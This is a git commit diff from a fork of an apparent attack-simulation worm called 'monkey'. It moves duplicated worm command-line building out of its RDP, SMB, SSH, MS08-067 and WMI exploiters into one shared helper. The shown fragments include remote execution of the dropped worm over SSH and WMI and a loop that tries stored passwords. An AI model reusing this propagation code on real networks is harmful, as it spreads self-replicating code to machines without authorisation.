forked from p34709852/monkey
merge duplicate code
This commit is contained in:
parent
63d8c4ed12
commit
76e3350fa3
|
@ -13,6 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
|
|||
from model.host import VictimHost
|
||||
from network.tools import check_port_tcp
|
||||
from exploit.tools import get_target_monkey
|
||||
from tools import build_monkey_commandline
|
||||
__author__ = 'hoffer'
|
||||
|
||||
KEYS_INTERVAL = 0.1
|
||||
|
@ -259,14 +260,7 @@ class RdpExploiter(HostExploiter):
|
|||
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
|
||||
return False
|
||||
|
||||
cmdline = " -p " + self._guid
|
||||
|
||||
if host.default_tunnel:
|
||||
cmdline += " -t " + host.default_tunnel
|
||||
if host.default_server:
|
||||
cmdline += " -s " + host.default_server
|
||||
if depth > 0:
|
||||
cmdline += " -d %d" % (depth - 1)
|
||||
cmdline = build_monkey_commandline(host, depth-1)
|
||||
|
||||
if self._config.rdp_use_vbs_download:
|
||||
command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline}
|
||||
|
|
|
@ -6,6 +6,7 @@ from exploit import HostExploiter
|
|||
from network.tools import check_port_tcp
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network import SMBFinger
|
||||
from tools import build_monkey_commandline
|
||||
|
||||
try:
|
||||
from impacket import smb
|
||||
|
@ -104,14 +105,7 @@ class SmbExploiter(HostExploiter):
|
|||
else:
|
||||
cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}
|
||||
|
||||
cmdline += " -p " + self._guid
|
||||
|
||||
if host.default_tunnel:
|
||||
cmdline += " -t " + host.default_tunnel
|
||||
if host.default_server:
|
||||
cmdline += " -s " + host.default_server
|
||||
if depth > 0:
|
||||
cmdline += " -d %d" % (depth - 1)
|
||||
cmdline += build_monkey_commandline(host, depth-1)
|
||||
|
||||
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
||||
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
import paramiko
|
||||
import monkeyfs
|
||||
import logging
|
||||
from tools import build_monkey_commandline
|
||||
from exploit import HostExploiter
|
||||
from model import MONKEY_ARG
|
||||
from exploit.tools import get_target_monkey
|
||||
|
@ -19,7 +20,6 @@ class SSHExploiter(HostExploiter):
|
|||
|
||||
def __init__(self):
|
||||
self._config = __import__('config').WormConfiguration
|
||||
self._guid = __import__('config').GUID
|
||||
self._update_timestamp = 0
|
||||
|
||||
def log_transfer(self, transferred, total):
|
||||
|
@ -118,14 +118,7 @@ class SSHExploiter(HostExploiter):
|
|||
|
||||
try:
|
||||
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
|
||||
cmdline += " -p " + self._guid
|
||||
if host.default_tunnel:
|
||||
cmdline += " -t " + host.default_tunnel
|
||||
if host.default_server:
|
||||
cmdline += " -s " + host.default_server
|
||||
if depth > 0:
|
||||
cmdline += " -d %d" % (depth - 1)
|
||||
|
||||
cmdline += build_monkey_commandline(host, depth-1)
|
||||
cmdline += "&"
|
||||
ssh.exec_command(cmdline)
|
||||
|
||||
|
|
|
@ -396,4 +396,22 @@ def get_target_monkey(host):
|
|||
host.os.get('machine','').lower() == platform.machine().lower():
|
||||
monkey_path = sys.executable
|
||||
|
||||
return monkey_path
|
||||
return monkey_path
|
||||
|
||||
|
||||
def build_monkey_commandline(target_host, depth):
|
||||
from config import WormConfiguration, GUID
|
||||
|
||||
cmdline = ""
|
||||
cmdline += " -p " + GUID
|
||||
|
||||
if target_host.default_tunnel:
|
||||
cmdline += " -t " + target_host.default_tunnel
|
||||
if target_host.default_server:
|
||||
cmdline += " -s " + target_host.default_server
|
||||
if depth < 0:
|
||||
depth = 0
|
||||
|
||||
cmdline += " -d %d" % depth
|
||||
|
||||
return cmdline
|
||||
|
|
|
@ -17,6 +17,7 @@ from . import HostExploiter
|
|||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
from network import SMBFinger
|
||||
from tools import build_monkey_commandline
|
||||
|
||||
try:
|
||||
from impacket import smb
|
||||
|
@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
self._config.ms08_067_remote_user_pass,
|
||||
src_path,
|
||||
self._config.dropper_target_path)
|
||||
|
||||
if not remote_full_path:
|
||||
# try other passwords for administrator
|
||||
for password in self._config.psexec_passwords:
|
||||
|
@ -250,14 +252,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
else:
|
||||
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
|
||||
|
||||
cmdline += " -p " + self._guid
|
||||
|
||||
if host.default_tunnel:
|
||||
cmdline += " -t " + host.default_tunnel
|
||||
if host.default_server:
|
||||
cmdline += " -s " + host.default_server
|
||||
if depth > 0:
|
||||
cmdline += " -d %d" % (depth - 1)
|
||||
cmdline += build_monkey_commandline(host, depth - 1)
|
||||
|
||||
try:
|
||||
sock.send("start %s\r\n" % (cmdline, ))
|
||||
|
|
|
@ -2,6 +2,7 @@ import socket
|
|||
import ntpath
|
||||
import logging
|
||||
import traceback
|
||||
from tools import build_monkey_commandline
|
||||
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
||||
from model.host import VictimHost
|
||||
from exploit import HostExploiter
|
||||
|
@ -85,14 +86,7 @@ class WmiExploiter(HostExploiter):
|
|||
else:
|
||||
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
|
||||
|
||||
cmdline += " -p " + self._guid
|
||||
|
||||
if host.default_tunnel:
|
||||
cmdline += " -t " + host.default_tunnel
|
||||
if host.default_server:
|
||||
cmdline += " -s " + host.default_server
|
||||
if depth > 0:
|
||||
cmdline += " -d %d" % (depth - 1)
|
||||
cmdline += build_monkey_commandline(host, depth - 1)
|
||||
|
||||
# execute the remote monkey
|
||||
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
|
||||
|
|
Loading…
Reference in New Issue